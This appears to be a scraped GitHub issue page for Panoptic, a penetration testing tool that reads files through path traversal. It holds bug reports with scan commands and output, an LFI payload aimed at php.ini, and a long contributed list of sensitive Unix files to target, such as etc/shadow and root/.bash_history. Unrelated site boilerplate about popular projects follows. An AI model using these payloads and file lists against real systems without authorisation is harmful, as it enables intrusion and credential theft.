Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
License: MIT License
Error reason '[SSL: CERTIFICATE_VERIFY_FAILED]
Hi I got this error while I am trying to run ./panoptic.py. page is containing self-sign certificate.
./panoptic.py -v -u https://10.11.1.35/section.php?page=bobdoc
.-',--.`-.
<_ | () | _>
`-`=='-'
Panoptic v0.1-df35a6c (https://github.com/lightos/Panoptic/)
[i] Starting scan at: 21:18:47
[i] Checking original response...
[x] Error reason '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:661)'.
[!] Something seems to be wrong with connection settings.
panoptic.py --url "http://localhost/apps/pbcs.dll/article?url=test"
Panoptic v0.1 (https://github.com/lightos/Panoptic/)
[i] Starting scan at: 00:02:47
[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: Windows
[?] Do you want to restrict further scans to 'Windows'? [Y/n] y
[+] Found '/Program Files/MySQL/data/mysql-bin.log' (Windows/Databases/log).
[+] Found '/Program Files/MySQL/data/mysql-bin.index' (Windows/Databases/log).
... etc
[+] Found '/WINDOWS/system32/Macromed/Flash/FlashInstall.log' (Windows/Desktop applications/log).
[+] Found '/WINDOWS/system32/Macromed/Flash/install.log' (Windows/Desktop applications/log).
[i] File search complete.
[i] Finishing scan at: 00:05:39
I believe the output to be a true hit because (other than owning the server it was tested on) in the omitted output it showed very unique and correct paths. However, when I run this same command subsequently (after trying the --write-files switch in between) it never gave me another hit. I tried toggling several other flags with no success.
It would be nice to have had the verbose output written to a log for comparison.
I try to add prefix to give it "../../../../../" but it isn't working.
set url="http://gertnerkluis.gertner.hackme.certifiedsecure.com/download.php?filename="
set cookie="_CERTIFIEDHACKME=secret"
set prefix=--prefix="../" --multiplier=5
set para= --param filename
python panoptic.py --url %url% %prefix% --cookie %cookie% %para% --verbose --threads=8
I also tried to edit your source code to but this also didn't work:
line 578: parser.add_option("--prefix", dest="prefix", default="../",
line 584: parser.add_option("--multiplier", dest="multiplier", type="int", default=5,
I have a feeling something goes wrong here. Can you confirm this?
i ran it like this:
./panoptic.py --url "http://192.168.1.2/lang" --data "lang=en" -p lang --multiplier=16 --prefix="../" -v
basically it's a post request to that page, vuln to LFI in the lang parameter with lang lilke:
lang=../../../../../../../../../../../../../../../../etc/php.ini%00en
also can you add other files to read for jboss/tomcat etc?
Thanks.
Attempting to run the --random-agent flag as such
panoptic.py -u "http://localhost:80/apps/pbcs.dll/misc?url=test" --verbose --random-agent
results in the following
Panoptic v0.1 (https://github.com/lightos/Panoptic/)
[i] Starting scan at: 01:55:21
[i] Checking original response...
[x] Error message 'Invalid header value 'NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1\n''.
[!] Something seems to be wrong with connection settings.
64bit windows 10 pro. Haven't tried it on my fedora box yet
Add the functionality to attempt to convert a LFI to a RFI using several known techniques.
Using an invalid value for --os, --software, --category will still run even though no test cases are generated.
Hi !
Any intention to make this project compatible with python ver 3
user@hive ~/Tools/Panoptic $ python -V
Python 3.8.7
user@hive ~/Tools/Panoptic $ python panoptic.py
File "panoptic.py", line 859
except Exception, e:
^
SyntaxError: invalid syntax
Cheers and stay healthy
When searching for certain file paths, the version of the software is required. One example is JBOSS which folder structure is like:
JBOSS_HOME\server\default\conf
JBOSS_HOME\server\default\log\
Using the latest code from Github. When selecting the Windows OS Panoptic seems to use forward slashes instead of backslashes.
I seem to be having issues with the proxy option too (doesn't seem to use it when set).
Python 2.7.8 on OS X
python panoptic.py -u "https://www.example.com/somefile.aspx?file=verification.pdf" --os Windows -v
.-',--.`-.
<_ | () | _>
`-`=='-'
Panoptic v0.1-c80dbb2 (https://github.com/lightos/Panoptic/)
[i] Starting scan at: 13:57:00
[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[*] Trying '/php5/php.ini'
[*] Trying '/php4/php.ini'
[*] Trying '/php/php.ini'
[*] Trying '/PHP/php.ini'
[*] Trying '/WINDOWS/php.ini'
[*] Trying '/WINNT/php.ini'
[*] Trying '/apache/php/php.ini'
[*] Trying '/xampp/apache/bin/php.ini'
Support for base64 encoding of specific payload values in the query string.
Values must be base64 encoded and stripped of any padding before the string gets url encoded.
Example URL: https://xxx.com:8080/blah
When creating output directory from parsed_target_url.netloc, ":" is not allowed on Windows.
A quick fix for line 432:
_ = os.path.join("output", kb.parsed_target_url.netloc)
to:
_ = os.path.join("output", kb.parsed_target_url.netloc.replace(":","_"))
Add support for URLs that include the path traversal in a semantic URL (https://en.wikipedia.org/wiki/Semantic_URL).
For example, instead of:
http://www.example.com/file.php?x=/etc/passwd
A semantic URL may include the path traversal in the following form:
http://www.example.com/file/x/etc/passwd
Great tool you guys have put together. Here is my personal *nix list which is comprised of custom and public lists I found online. There might be some in here that you can use.
.etc/mail/sendmail.conf
apache/logs/access.log
apache/logs/error.log
config.php
etc/GeoIP.conf.default
etc/PolicyKit/PolicyKit.conf
etc/X11/xorg.conf
etc/X11/xorg.conf-vesa
etc/X11/xorg.conf-vmware
etc/X11/xorg.conf.BeforeVMwareToolsInstall
etc/X11/xorg.conf.orig
etc/adduser.conf
etc/airoscript.conf
etc/apache2/apache2.conf
etc/apache2/conf.d
etc/apache2/conf.d/charset
etc/apache2/conf.d/security
etc/apache2/envvars
etc/apache2/httpd.conf
etc/apache2/mods-available/autoindex.conf
etc/apache2/mods-available/deflate.conf
etc/apache2/mods-available/dir.conf
etc/apache2/mods-available/mem_cache.conf
etc/apache2/mods-available/mime.conf
etc/apache2/mods-available/proxy.conf
etc/apache2/mods-available/setenvif.conf
etc/apache2/mods-available/ssl.conf
etc/apache2/mods-enabled/alias.conf
etc/apache2/mods-enabled/deflate.conf
etc/apache2/mods-enabled/dir.conf
etc/apache2/mods-enabled/mime.conf
etc/apache2/mods-enabled/negotiation.conf
etc/apache2/mods-enabled/php5.conf
etc/apache2/mods-enabled/status.conf
etc/apache2/ports.conf
etc/apt/apt.conf.d
etc/apt/apt.conf.d/00trustcdrom
etc/apt/apt.conf.d/01autoremove
etc/apt/apt.conf.d/01ubuntu
etc/apt/apt.conf.d/05aptitude
etc/apt/apt.conf.d/50unattended-upgrades
etc/apt/apt.conf.d/70debconf
etc/arpalert/arpalert.conf
etc/avahi/avahi-daemon.conf
etc/bash_completion.d/debconf
etc/belocs/locale-gen.conf
etc/bluetooth/input.conf
etc/bluetooth/main.conf
etc/bluetooth/network.conf
etc/bluetooth/rfcomm.conf
etc/bonobo-activation/bonobo-activation-config.xml
etc/ca-certificates.conf
etc/ca-certificates.conf.dpkg-old
etc/casper.conf
etc/chkrootkit.conf
etc/clamav/clamd.conf
etc/clamav/freshclam.conf
etc/conky/conky.conf
etc/console-tools/config.d
etc/console-tools/config.d/splashy
etc/cups/acroread.conf
etc/cups/cupsd.conf
etc/cups/cupsd.conf.default
etc/cups/pdftops.conf
etc/cups/printers.conf
etc/cvs-cron.conf
etc/cvs-pserver.conf
etc/dbus-1/session.conf
etc/dbus-1/system.conf
etc/debconf.conf
etc/defoma/config
etc/defoma/config/x-ttcidfont-conf.conf2
etc/deluser.conf
etc/depmod.d/ubuntu.conf
etc/dhcp3/dhclient.conf
etc/dhcp3/dhcpd.conf
etc/discover-modprobe.conf
etc/discover.conf.d
etc/discover.conf.d/00discover
etc/dns2tcpd.conf
etc/e2fsck.conf
etc/esound/esd.conf
etc/etter.conf
etc/fonts/conf.d
etc/fonts/conf.d/README
etc/foomatic/filter.conf
etc/foremost.conf
etc/freetds/freetds.conf
etc/fuse.conf
etc/gconf
etc/gconf/2
etc/gconf/2/evoldap.conf
etc/gconf/2/path
etc/gconf/gconf.xml.defaults
etc/gconf/gconf.xml.defaults/%gconf-tree.xml
etc/gconf/gconf.xml.mandatory
etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
etc/gconf/gconf.xml.system
etc/gdm/failsafeDexconf
etc/gnome-vfs-2.0/modules/default-modules.conf
etc/gnome-vfs-2.0/modules/extra-modules.conf
etc/gre.d/1.9.0.10.system.conf
etc/gre.d/1.9.0.14.system.conf
etc/gre.d/1.9.0.15.system.conf
etc/group
etc/gtk-2.0/im-multipress.conf
etc/hdparm.conf
etc/host.conf
etc/htdig/htdig.conf
etc/httpd/logs/acces.log
etc/httpd/logs/acces_log
etc/httpd/logs/error.log
etc/httpd/logs/error_log
etc/inetd.conf
etc/initramfs-tools/conf.d
etc/irssi.conf
etc/java-6-sun/fontconfig.properties
etc/kbd/config
etc/kernel-img.conf
etc/kernel-pkg.conf
etc/ld.so.conf
etc/ldap/ldap.conf
etc/logrotate.conf
etc/ltrace.conf
etc/manpath.config
etc/menu-methods/menu.config
etc/miredo-server.conf
etc/miredo.conf
etc/miredo/miredo-server.conf
etc/miredo/miredo.conf
etc/modprobe.d/vmware-tools.conf
etc/mono/1.0/machine.config
etc/mono/2.0/machine.config
etc/mono/2.0/web.config
etc/mono/config
etc/mtools.conf
etc/mysql/conf.d
etc/mysql/conf.d/old_passwords.cnf
etc/mysql/my.cnf
etc/nsswitch.conf
etc/oinkmaster.conf
etc/openvpn/update-resolv-conf
etc/pam.conf
etc/passwd
etc/pear/pear.conf
etc/php5/apache2/conf.d
etc/php5/apache2/php.ini
etc/pm/config.d
etc/pm/config.d/00sleep_module
etc/postgresql-common/autovacuum.conf
etc/prelude/default/global.conf
etc/prelude/default/idmef-client.conf
etc/prelude/default/tls.conf
etc/privoxy/config
etc/proxychains.conf
etc/pulse/client.conf
etc/python/debian_config
etc/reader.conf
etc/reader.conf.d
etc/reader.conf.d/0comments
etc/reader.conf.d/libccidtwin
etc/reader.conf.old
etc/remastersys.conf
etc/resolv.conf
etc/resolvconf
etc/resolvconf/update-libc.d
etc/resolvconf/update-libc.d/sendmail
etc/rinetd.conf
etc/samba/dhcp.conf
etc/samba/smb.conf
etc/scrollkeeper.conf
etc/security/access.conf
etc/security/group.conf
etc/security/limits.conf
etc/security/namespace.conf
etc/security/opasswd
etc/security/pam_env.conf
etc/security/sepermit.conf
etc/security/time.conf
etc/sensors.conf
etc/shadow
etc/skel/.config
etc/skel/.config/Trolltech.conf
etc/skel/.config/codef00.com
etc/skel/.config/menus
etc/skel/.config/menus/applications-kmenuedit.menu
etc/skel/.config/user-dirs.dirs
etc/skel/.config/user-dirs.locale
etc/skel/.kde3/share/apps/kconf_update
etc/skel/.kde3/share/apps/kconf_update/log/update.log
etc/skel/.kde3/share/share/apps/kconf_update
etc/skel/.kde3/share/share/apps/kconf_update/log
etc/skel/.kde3/share/share/apps/kconf_update/log/update.log
etc/smi.conf
etc/snmp/snmpd.conf
etc/snort/reference.config
etc/snort/rules/emerging.conf
etc/snort/rules/open-test.conf
etc/snort/snort-mysql.conf
etc/snort/snort.conf
etc/snort/threshold.conf
etc/splashy/config.xml
etc/ssh/sshd_config
etc/stunnel/stunnel.conf
etc/subversion/config
etc/sysctl.conf
etc/sysctl.d/10-console-messages.conf
etc/sysctl.d/10-network-security.conf
etc/sysctl.d/10-process-security.conf
etc/sysctl.d/wine.sysctl.conf
etc/syslog.conf
etc/tinyproxy/tinyproxy.conf
etc/tor/tor-tsocks.conf
etc/tpvmlp.conf
etc/tsocks.conf
etc/ucf.conf
etc/udev/udev.conf
etc/ufw/sysctl.conf
etc/ufw/ufw.conf
etc/uniconf.conf
etc/unicornscan/modules.conf
etc/unicornscan/payloads.conf
etc/unicornscan/unicorn.conf
etc/updatedb.conf
etc/updatedb.conf.BeforeVMwareToolsInstall
etc/vmware-tools/config
etc/vmware-tools/tpvmlp.conf
etc/vmware-tools/vmware-tools-libraries.conf
etc/w3m/config
etc/wicd/dhclient.conf.template.default
etc/wicd/manager-settings.conf
etc/wicd/wired-settings.conf
etc/wicd/wireless-settings.conf
etc/xdg/user-dirs.conf
proc/cpuinfo
proc/meminfo
proc/self/cmdline
proc/self/environ
proc/self/fd/0
proc/self/fd/1
proc/self/fd/10
proc/self/fd/11
proc/self/fd/12
proc/self/fd/13
proc/self/fd/14
proc/self/fd/15
proc/self/fd/2
proc/self/fd/3
proc/self/fd/4
proc/self/fd/5
proc/self/fd/6
proc/self/fd/7
proc/self/fd/8
proc/self/fd/9
proc/self/mounts
proc/self/stat
proc/self/status
proc/version
root/.bash_history
root/.bashrc
root/.mysql_history
share/snmp/snmpd.conf
usr/local/apache/logs/access.log
usr/local/apache/logs/access_log
usr/local/apache/logs/error.log
usr/local/apache/logs/error_log
var/log/access.log
var/log/access_log
var/log/apache/access.log
var/log/apache/access_log
var/log/apache/error.log
var/log/apache/error_log
var/log/apache2/access.log
var/log/apache2/access_log
var/log/apache2/error.log
var/log/apache2/error_log
var/log/error.log
var/log/error_log
var/log/mysql.err
var/www/logs/access.log
var/www/logs/access_log
var/www/logs/error.log
var/www/logs/error_log
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.